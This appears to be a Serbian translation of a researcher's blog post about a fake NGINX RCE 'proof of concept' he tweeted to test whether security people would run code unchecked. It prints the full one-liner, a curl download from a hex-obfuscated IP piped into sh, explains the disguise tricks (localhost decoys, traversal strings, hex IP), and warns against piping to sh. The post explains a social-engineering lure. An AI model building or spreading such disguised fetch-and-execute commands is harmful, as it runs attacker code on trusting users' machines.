Белешка. трансл.: оригинална белешка, објављена 1. јуна, одлучио је да спроведе експеримент међу заинтересованима за безбедност информација. Да би то урадио, припремио је лажну експлоатацију за неоткривену рањивост на веб серверу и објавио је на свом Твитеру. Његове претпоставке – да их одмах разоткрију стручњаци који би видели очигледну обману у коду – не само да се нису обистиниле... Надмашиле су сва очекивања, иу супротном смеру: твит је добио огромну подршку бројних људи који нису проверите њен садржај.
ТЛ;ДР: Ни у ком случају немојте користити цевоводе датотека у сх или басх. Ово је одличан начин да изгубите контролу над рачунаром.
Желим да поделим са вама кратку причу о комичној ПоЦ експлоатацији која је настала 31. маја. Одмах се појавио као одговор на вести из , члан (ЗДИ), та информација о рањивости у НГИНКС-у која води до РЦЕ (даљинско извршавање кода) ће ускоро бити откривена. Пошто НГИНКС покреће многе веб-сајтове, вест мора да је била бомба. Али због кашњења у процесу „одговорног обелодањивања“, детаљи онога што се догодило нису били познати – ово је стандардна процедура ЗДИ.
о откривању рањивости у НГИНКС-у
Пошто сам завршио рад на новој техници замагљивања у цурл-у, цитирао сам оригинални твит и „процурео радни ПоЦ“ који се састоји од једне линије кода који наводно користи откривену рањивост. Наравно, ово је била потпуна глупост. Претпостављао сам да ћу одмах бити разоткривен и да ћу у најбољем случају добити пар ретвитова (ма добро).
са лажним експлоатацијом
Међутим, нисам могао да замислим шта се даље догодило. Популарност мог твита је нагло порасла. Изненађујуће, у овом тренутку (15:00 по московском времену 1. јуна) мало људи је схватило да је ово лаж. Многи људи га ретвитују а да га уопште не провере (а камоли да се диве дивној АСЦИИ графики коју даје).
Погледајте само како је лепо!
Иако су све ове петље и боје сјајне, јасно је да су људи морали да покрену код на својој машини да би их видели. Срећом, претраживачи функционишу на исти начин, а у комбинацији са чињеницом да нисам желео да упадам у правне проблеме, код закопан у мојој веб локацији је само упућивао ехо позиве без покушаја да инсталирам или извршим било који додатни код.
Мала дигресија: , , ја и остали момци из тима Већ неко време играмо се са различитим начинима да замаглимо команде цурл јер је то кул... а ми смо штребери. нетспооки и днз открили су неколико нових метода које су ми изгледале изузетно обећавајуће. Придружио сам се забави и покушао да додам ИП децималне конверзије у торбу трикова. Испоставило се да се ИП такође може конвертовати у хексадецимални формат. Штавише, цурл и већина других НИКС алата са задовољством једу хексадецималне ИП адресе! Дакле, било је само питање стварања уверљиве командне линије која изгледа безбедно. На крају сам се одлучио на ово:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhostДруштвено-електронски инжењеринг (СЕЕ) – више од пуког пхисхинг-а
Сигурност и познавање су били главни део овог експеримента. Мислим да су управо они довели до његовог успеха. Командна линија је јасно подразумевала безбедност позивајући се на „127.0.0.1“ (познати локални хост). Лоцалхост се сматра безбедним и подаци на њему никада не напуштају ваш рачунар.
Познавање је била друга кључна компонента експеримента у ЈИЕ. Пошто су циљну публику првенствено чинили људи упознати са основама рачунарске безбедности, било је важно креирати код тако да делови изгледа познати и познати (а самим тим и сигурни). Позајмљивање елемената старих експлоатских концепата и њихово комбиновање на необичан начин показало се веома успешним.
Испод је детаљна анализа једнолиније. Све на овој листи носи козметичке природе, и практично ништа није потребно за његов стварни рад.
Које компоненте су заиста неопходне? Ово -gsS, -O 0x0238f06a, |sh и самог веб сервера. Веб сервер није садржао никаква злонамерна упутства, већ је једноставно служио АСЦИИ графику користећи команде echo у писму садржаном у index.html. Када је корисник унео ред са |sh у средини, index.html учитан и извршен. На срећу, чувари веб сервера нису имали зле намере.
-
../../../%00— представља превазилажење именика; -
ngx_stream_module.so— путања до насумичног НГИНКС модула; -
/bin/sh%00<'protocol:TCP'— наводно лансирамо/bin/shна циљној машини и преусмерите излаз на ТЦП канал; -
-O 0x0238f06a#PLToffset- тајни састојак, допуњен#PLToffset, да изгледа као меморијски офсет на неки начин садржан у ПЛТ-у; -
|sh;- још један важан фрагмент. Морали смо да преусмеримо излаз на сх/басх да бисмо извршили код који долази са нападачког веб сервера који се налази на0x0238f06a(2.56.240.x); -
nc /dev/tcp/localhost- лутка у којој се нетцат односи на/dev/tcp/localhostтако да опет све изгледа сигурно. У ствари, не ради ништа и укључен је у линију за лепоту.
Овим се завршава декодирање скрипте у једном реду и дискусија о аспектима „социо-електронског инжењеринга“ (замршен пхисхинг).
Конфигурација веб сервера и противмере
Пошто су велика већина мојих претплатника инфосец/хакери, одлучио сам да веб сервер учиним мало отпорнијим на изражавање „интересовања“ са њихове стране, само да би момци имали шта да раде (и било би забавно да подесити). Нећу овде да наводим све замке пошто је експеримент још увек у току, али ево неколико ствари које сервер ради:
- Активно прати покушаје дистрибуције на одређеним друштвеним мрежама и замењује разне сличице за преглед како би подстакао корисника да кликне на линк.
- Преусмерава Цхроме/Мозилла/Сафари/итд на промотивни видео Тхугцровд уместо да приказује схелл скрипту.
- Пази на ОЧИТНЕ знакове упада/очигледног хаковања, а затим почиње да преусмерава захтеве на НСА сервере (ха!).
- Инсталира тројанца, као и БИОС рооткит, на све рачунаре чији корисници посећују хост из обичног претраживача (шалим се!).
Мали део антимера
У овом случају, мој једини циљ је био да савладам неке од карактеристика Апацхе-а - посебно, цоол правила за преусмеравање захтева - и помислио сам: зашто да не?
НГИНКС експлоатација (стварно!)
Претплатите се на на Твитеру и пратите ЗДИ-јев сјајан рад на решавању веома стварних рањивости и могућности експлоатације у НГИНКС-у. Њихов рад ме је одувек фасцинирао и захвалан сам Алис на стрпљењу са свим спомињањима и обавештењима које је изазвао мој глупи твит. На срећу, то је такође донело нешто добро: помогло је да се подигне свест о рањивости НГИНКС-а, као и проблемима изазваним злоупотребом цурл-а.
Извор: ввв.хабр.цом